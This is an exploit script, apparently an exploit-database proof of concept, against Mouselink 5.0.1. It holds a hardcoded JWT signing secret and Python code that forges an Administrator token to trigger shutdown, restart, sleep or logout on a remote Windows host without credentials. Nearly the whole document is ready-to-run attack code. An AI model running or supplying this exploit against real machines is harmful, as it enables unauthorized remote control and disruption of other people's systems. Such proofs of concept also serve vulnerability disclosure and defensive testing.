# Exploit Title: Mouselink 5.0.1 - Unauthenticated Remote System Control
# Date: 26/06/25
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://mouselink.app/
# Software Link: https://blob.mouselink.app/mouselink-win-Setup.exe
# Version: 5.0.1
# Tested on: Windows 10

'''
Description:

Mouselink 5.0.1 is vulnerable to JWT authentication bypass, allowing remote
attackers to perform system-level actions such as shutdown, restart, sleep,
and logout without valid credentials.

'''

#!/usr/bin/env python3

import requests
import argparse
import jwt
import uuid
import datetime

SERVER_IP = "192.168.8.105"
SERVER_PORT = 11521
BASE_URL = f"http://{SERVER_IP}:{SERVER_PORT}"


JWT_SECRET = "gpdTeiQc5@DeU36NEh^8$zK2V!dJ2djTT9aK6gRouJpJ9n^aBYv3#5"
JWT_ISSUER = "Server"

def forge_jwt(username="admin"):
    payload = {
        "sub": username,
        "iss": JWT_ISSUER,
        "jti": str(uuid.uuid4()),
        "roles": "Administrator",
        "exp": datetime.datetime.utcnow() + datetime.timedelta(days=1)
    }
    return jwt.encode(payload, JWT_SECRET, algorithm="HS256")

def send_pc_control_command(token, action):
    endpoint = f"{BASE_URL}/api/PCControl/{action}"
    headers = {
        "Authorization": f"Bearer {token}",
        "User-Agent": "Dart/3.5 (dart:io)",
        "Accept-Encoding": "gzip",
        "Host": f"{SERVER_IP}:{SERVER_PORT}"
    }
    try:
        response = requests.get(endpoint, headers=headers, timeout=5)
        data = response.json()
        if data.get("success") == True:
            print(f"[+] {action} request sent successfully.")
        else:
            print(f"[-] {action} failed. Response: {data}")
    except Exception as e:
        print(f"[-] Error while sending {action} request: {e}")

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="Mouselink 5.0.1 Remote PC
Control Exploit (Auth Bypass)")
    parser.add_argument("--shutdown", action="store_true", help="Trigger
system shutdown")
    parser.add_argument("--restart", action="store_true", help="Trigger
system restart")
    parser.add_argument("--sleep", action="store_true", help="Put system to
sleep")
    parser.add_argument("--logout", action="store_true", help="Log out
current user")

    args = parser.parse_args()

    print("[*] Forging JWT token for authentication bypass...")
    token = forge_jwt()
    print(f"[+] Forged token: {token[:50]}...")

    if args.shutdown:
        send_pc_control_command(token, "Shutdown")
    elif args.restart:
        send_pc_control_command(token, "Restart")
    elif args.sleep:
        send_pc_control_command(token, "Sleep")
    elif args.logout:
        send_pc_control_command(token, "Logout")
    else:
        print("[-] No action specified. Use --shutdown, --restart, --sleep,
or --logout.")